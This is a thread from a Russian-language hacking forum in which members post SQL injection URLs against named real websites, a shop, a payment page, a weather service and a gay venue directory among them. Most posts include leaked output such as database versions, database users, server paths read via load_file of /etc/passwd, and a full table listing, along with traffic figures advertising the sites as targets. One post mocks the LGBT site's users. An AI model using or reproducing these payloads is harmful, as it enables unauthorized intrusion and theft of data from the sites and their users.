SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Code:
    http://www.ugon.kz/index.php?option=com_ncatalogues&controller=ajax&task=multiselect&id=28%20UNION%20ALL%20SELECT%20NULL,version%28%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&JsHttpRequest=14458949481000-xml
    
    5.5.44-cll-lve
     
    xivi00 likes this.
  2. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
  3. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://frisbee-pay.ru/client/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1
     
  4. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.iqpartner.info/ru/?CATALOG=hosting_tariff%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271
    Code:
    http://platforma.ru/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1
     
    #64 xivi00, 4 Nov 2015
    Last edited: 4 Nov 2015
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Яндекс Тиц [​IMG] 210 - Google Page Rank 3/10
    Яндекс Каталог Да - DMOZ.org каталог Да

    Code:
    http://www.soate.ru/news/new.php?id=-54+union+select+version(),2,3,4,5+--+


    Версия:
    5.5.44-1+wheezy1+mh1-log
     
  6. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Code:
    http://www.allomebel.ru/shop/?dir=-9%20union%20select%201,2,3,4,5,version%28%29,7,8,9%20--
    5.5.30-log

    ЯК, тиц 70


    Code:
    http://www.fortland.ru/index.html?action=catalog&id=-6%20union%20select%201,2,3,4,5,6,version%28%29,8,9,10,11
    5.5.46-cll

    ЯК, ТИЦ 200
     
    #66 OSW, 20 Nov 2015
    Last edited: 20 Nov 2015
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    Code:
    http://www.rinekekop.nl/get_item.php?id=33'/*!50000UNION*//*!50000SELECT*/1,2,version(),user(),5-- -
    5.5.42-cll-lve
    ijsvogel@localhost
     
  8. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Яндекс Тиц [​IMG] 230 - Google Page Rank 3/10
    Яндекс Каталог Да - DMOZ.org каталог Нет
    Code:
    http://basket.ugmk.com/ru/news/index.php?id15=-10394+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
     
    Gorev likes this.
  9. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://inet.pushkino-telecom.ru/index.php?id=qiwi-pay%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271
     
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Траф 50к
    Pr 5
    Code:
    http://astroscope.ru/blog/rate.php?id=-2842'+or+1+group+by+concat(0x7c,(select+mid((ifnull(cast(schema_name+as+char),0x20)),1,54)+from+information_schema.schemata+limit+1,1),0x7c,floor(rand(0)*2))+having+min(0)%23
     
    #70 Vip77, 12 Dec 2015
    Last edited: 12 Dec 2015
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://wmfast.com/news.php?id=-10%27+union+select+1,2,3,4+--+
     
  12. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Трафик 85к
    Тиц 800
    PR 5

    Code:
    http://novostimira.com/videonews.php?act=view&id=1' and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
     
  13. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Трафик 100к
    Тиц 1600
    Pr 7
    File_priv=Y

    Code:
    http://pogoda.by/climat-directory/index.php?year=1'+union+all+select+concat(0x7e,0x27,load_file('/etc/passwd'),0x27,0x7e),1,1,1--+
    ServerName pogoda.by
    /var/www/html

    ServerName pda.pogoda.by
    /var/www/html/pda

    ServerName meteoinfo.by
    /var/www/www.meteoinfo.by

    ServerName 6.pogoda.by
    /var/www/html/six
     
    #73 Vip77, 17 Dec 2015
    Last edited: 17 Dec 2015
  14. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    THE OTHER WORLD KINGDOM 18+

    HTML:
    http://www.owk.cz/philosophy-operation/whoweare/subject.php?id=-9%20union%20select%201,version(),database(),user(),5,6,7,8,9,10--+f
    ТИЦ10
    PR3
    AR405,200
    Visits 25K

    5.1.73-1+deb6u1:eek:wk:OWK_shop@localhost
     
    Zako and AlmiroN like this.
  15. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    RU SHOP
    Code:
    http://thedespair.ru/product/0'+UnIon+selECt+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
    5.5.35-rel33.0-log
     
    Ruslan1993it and BabaDook like this.
  16. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Code:
    http://www.colinst.com/brief.php?id=51%20and%20(select%201%20from(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
    
    Duplicate entry 'root@localhost1' for key 1
    Версия 5.0.671

    Присутствует waf на union select
     
  17. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Тиц 60 PR 3

    Code:
    http://www.eastoftheweb.com/short-stories/index.php?p=web/author/GuydeMaupassant%27+union+select+@@version,2+--+
     
  18. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    В помощь Милонову
    gaycities.com 253к голубцов

    Code:
    h**p://www.gaycities.com/biz/account/biz_activate.php
    POST:pwsubmit=Verify Email Address&c=0c425b5&code=94102&referrer=http://www.gaycities.com/biz/account/&un=1') RLIKE (SELECT (CASE WHEN (666=666) THEN 1 ELSE 0x28 END)) AND ('gayS'='gayS
    MySQL 5.1.33
    +----------------------------------------+
    | metro_newslettes |
    | abuse_reports |
    | admin_contacts |
    | admin_email_verifications_config |
    | admin_email_verifications_lookup |
    | answer_likes |
    | answer_listings |
    | answers |
    | badges |
    | bars_guestreviews |
    | bizusers |
    | bizusers_listings |
    | bizusers_listings_updates |
    | checkin_lookups |
    | checkins |
    | checkins_emails |
    | checkins_medals |
    | checkins_scores |
    | comments |
    | contact |
    | contest_entries |
    | cron_tbl_dates |
    | editor_assigned |
    | editors |
    | enhanced_lis@ings |
    | event_comments |
    | events |
    | events_relationships |
    | events_tags |
    | external_histing_foursquare_categories |
    | facebook_beenthere |
    | facebook_eveht_owners_approve |
    | facebook_friends |
    | facebook_going |
    | facebook_pages |
    | favorites |
    | featured_items |
    | foursquare_categories |
    | friends |
    | galleries |
    | gallery_images |
    | giveaways |
    | iglta_hotels |
    | iglta_hotels_incoming |
    | iphone_beta_testers |
    | iphone_logger |
    | likes |
    | list_items |
    | listing_images |
    | listing_likes |
    | listing_prizes |
    | listing_types |
    | listing_updates |
    | listings |
    | listings_cleaned |
    | listings_copy |
    | listings_copy2 |
    | listings_external |
    | listings_tags |
    | mail |
    | metro_newsletter_events |
    | metro_newsletter_subsbriptions |
    | metros |
    | metros_geonames |
    | metros_urls |
    | neighborhoods |
    | nem_register |
    | newsfeed_items |
    | password_resetcodes |
    | paypal_payment_info |
    | pending_listing_reviews |
    | pending_listings |
    | peopletags |
    | permissions |
    | photocontest_images |
    | photocontest_judges |
    | photocontests |
    | polls_content |
    | polls_votes |
    | press |
    | programming_featpres |
    | programming_mobile_broadcast |
    | promo_locations |
    | question_follows |
    | questions |
    | ratings |
    | reviews |
    | schema_updates |
    | search_synonyms |
    | setting_permissions |
    | settings |
    | tag_approved_hotels |
    | tag_approved_hotels_incoming |
    | tags |
    | temp_49_entries |
    | temp_checkins |
    | temp_emails |
    | temp_fb_event_owners |
    | temp_locationusers |
    | user_images |
    | user_messages |
    | user_settings |
    | users |
    | users_events |
    | users_peopletags |
    | users_socialnets |
    | weekly_newsletters |
    +----------------------------------------+
     
    _________________________
    palec2006 likes this.
  19. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    https://www.billykfitness.com/fitness/index.php/pay?pid=1%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20--
    5.1.731 for key
     
  20. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Тиц 325 Pr 3
    Code:
    http://www.ph4.ru/h_CITIES.php?d=2154+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+--+
    5.5.44-37.3-log